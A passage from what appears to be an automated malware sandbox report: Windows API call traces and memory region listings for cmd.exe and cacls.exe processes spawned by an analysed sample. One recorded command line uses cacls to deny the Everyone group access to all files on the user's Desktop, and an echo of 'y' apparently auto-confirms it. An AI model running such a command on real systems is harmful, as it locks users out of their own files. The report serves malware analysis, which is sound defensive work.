lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.384] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0035.384] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.384] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0035.384] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0035.384] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0035.384] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0035.384] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0035.384] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0035.384] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0035.384] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0035.384] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0035.384] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa3fbb4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.384] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xa3fbb4, lpFilePart=0xa3fbb0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xa3fbb0*="Desktop") returned 0x1c [0035.384] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.384] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa3f930 | out: lpFindFileData=0xa3f930) returned 0xdc4270 [0035.385] FindClose (in: hFindFile=0xdc4270 | out: hFindFile=0xdc4270) returned 1 [0035.385] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xa3f930 | out: lpFindFileData=0xa3f930) returned 0xdc4270 [0035.385] FindClose (in: hFindFile=0xdc4270 | out: hFindFile=0xdc4270) returned 1 [0035.385] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0035.385] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xa3f930 | out: lpFindFileData=0xa3f930) returned 0xdc4270 [0035.385] FindClose (in: hFindFile=0xdc4270 | out: hFindFile=0xdc4270) returned 1 [0035.385] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.385] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0035.385] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0035.385] GetEnvironmentStringsW () returned 0xdc60b0* [0035.385] FreeEnvironmentStringsA (penv="=") returned 1 [0035.385] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.386] GetConsoleOutputCP () returned 0x1b5 [0035.409] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.409] GetUserDefaultLCID () returned 0x409 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa3fce0, cchData=128 | out: lpLCData="0") returned 2 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa3fce0, cchData=128 | out: lpLCData="0") returned 2 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa3fce0, cchData=128 | out: lpLCData="1") returned 2 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0035.409] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0035.409] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0035.410] GetConsoleTitleW (in: lpConsoleTitle=0xdc4d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.410] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.410] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0035.410] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0035.410] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0035.411] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.411] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.411] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.411] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.411] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.411] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.411] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.411] GetConsoleTitleW (in: lpConsoleTitle=0xa3f9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.412] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.412] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.412] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.412] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.412] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.412] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.412] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.412] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.412] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.412] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.412] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0xa3f98c | out: _Buffer="y\r\n") returned 3 [0035.412] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.412] GetFileType (hFile=0x28) returned 0x3 [0035.412] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.413] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0035.413] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0xa3f97c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0xa3f97c*=0x3, lpOverlapped=0x0) returned 1 [0035.413] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.413] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.413] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.413] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.413] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.413] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.413] SetConsoleInputExeNameW () returned 0x1 [0035.413] GetConsoleOutputCP () returned 0x1b5 [0035.413] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.413] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.413] exit (_Code=0) Process: id = "7" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0xf64b000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\5JgHKoaOfdp\\Desktop\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 386 start_va = 0x4b0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 387 start_va = 0x4d0000 end_va = 0x4d1fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 388 start_va = 0x4e0000 end_va = 0x4eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 389 start_va = 0x4f0000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 390 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 391 start_va = 0x570000 end_va = 0x573fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 392 start_va = 0x580000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 393 start_va = 0x590000 end_va = 0x591fff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 394 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 395 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 396 start_va = 0x7f030000 end_va = 0x7f052fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f030000" filename = "" Region: id = 397 start_va = 0x7f058000 end_va = 0x7f058fff entry_point = 0x0 region_type = private name = "private_0x000000007f058000" filename = "" Region: id = 398 start_va = 0x7f05b000 end_va = 0x7f05bfff entry_point = 0x0 region_type = private name = "private_0x000000007f05b000" filename = "" Region: id = 399 start_va = 0x7f05d000 end_va = 0x7f05ffff entry_point = 0x0 region_type = private name = "private_0x000000007f05d000" filename = "" Region: id = 400 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 401 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 402 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 403 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 404 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 405 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 406 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 407 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 416 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 417 start_va = 0x5a0000 end_va = 0x61dfff entry_point = 0x5a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 418 start_va = 0x640000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 419 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 420 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 421 start_va = 0x7ef30000 end_va = 0x7f02ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef30000" filename = "" Region: id = 422 start_va = 0x4c0000 end_va = 0x4c3fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 423 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 424 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 425 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 426 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 427 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 428 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Thread: id = 9 os_tid = 0xb24 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xc99d000" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 430 start_va = 0x350000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 431 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 432 start_va = 0x380000 end_va = 0x38efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 433 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 434 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 435 start_va = 0x4d0000 end_va = 0x4d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 436 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 437 start_va = 0x4f0000 end_va = 0x4f1fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 438 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 439 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 440 start_va = 0x7ea60000 end_va = 0x7ea82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea60000" filename = "" Region: id = 441 start_va = 0x7ea8b000 end_va = 0x7ea8dfff entry_point = 0x0 region_type = private name = "private_0x000000007ea8b000" filename = "" Region: id = 442 start_va = 0x7ea8e000 end_va = 0x7ea8efff entry_point = 0x0 region_type = private name = "private_0x000000007ea8e000" filename = "" Region: id = 443 start_va = 0x7ea8f000 end_va = 0x7ea8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea8f000" filename = "" Region: id = 444 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 445 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 446 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 447 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 448 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 449 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 450 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 451 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 470 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 471 start_va = 0x500000 end_va = 0x57dfff entry_point = 0x500000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 472 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 473 start_va = 0x6a0000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 474 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 475 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 476 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 477 start_va = 0x7e960000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e960000" filename = "" Region: id = 478 start_va = 0x360000 end_va = 0x363fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Thread: id = 10 os_tid = 0xb4c [0035.594] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0035.594] __set_app_type (_Type=0x1) [0035.594] __p__fmode () returned 0x76ea1768 [0035.594] __p__commode () returned 0x76ea176c [0035.594] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0035.595] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0035.595] GetCurrentThreadId () returned 0xb4c [0035.595] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb4c) returned 0x30 [0035.595] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.595] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0035.595] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.596] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0035.596] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4cfb4c | out: phkResult=0x4cfb4c*=0x0) returned 0x2 [0035.597] VirtualQuery (in: lpAddress=0x4cfb5b, lpBuffer=0x4cfaf4, dwLength=0x1c | out: lpBuffer=0x4cfaf4*(BaseAddress=0x4cf000, AllocationBase=0x3d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.597] VirtualQuery (in: lpAddress=0x3d0000, lpBuffer=0x4cfaf4, dwLength=0x1c | out: lpBuffer=0x4cfaf4*(BaseAddress=0x3d0000, AllocationBase=0x3d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0035.597] VirtualQuery (in: lpAddress=0x3d1000, lpBuffer=0x4cfaf4, dwLength=0x1c | out: lpBuffer=0x4cfaf4*(BaseAddress=0x3d1000, AllocationBase=0x3d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0035.597] VirtualQuery (in: lpAddress=0x3d3000, lpBuffer=0x4cfaf4, dwLength=0x1c | out: lpBuffer=0x4cfaf4*(BaseAddress=0x3d3000, AllocationBase=0x3d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0035.597] VirtualQuery (in: lpAddress=0x4d0000, lpBuffer=0x4cfaf4, dwLength=0x1c | out: lpBuffer=0x4cfaf4*(BaseAddress=0x4d0000, AllocationBase=0x4d0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0035.597] GetConsoleOutputCP () returned 0x1b5 [0035.597] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.597] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0035.597] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.597] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.597] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.597] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.597] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.597] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.597] GetEnvironmentStringsW () returned 0x6a4058* [0035.597] FreeEnvironmentStringsA (penv="=") returned 1 [0035.597] GetEnvironmentStringsW () returned 0x6a4058* [0035.597] FreeEnvironmentStringsA (penv="=") returned 1 [0035.598] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cea9c | out: phkResult=0x4cea9c*=0x40) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x0, lpData=0x4ceaa8*=0xb2, lpcbData=0x4ceaa0*=0x1000) returned 0x2 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x1, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x0, lpData=0x4ceaa8*=0x1, lpcbData=0x4ceaa0*=0x1000) returned 0x2 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x0, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x40, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x40, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x0, lpData=0x4ceaa8*=0x40, lpcbData=0x4ceaa0*=0x1000) returned 0x2 [0035.598] RegCloseKey 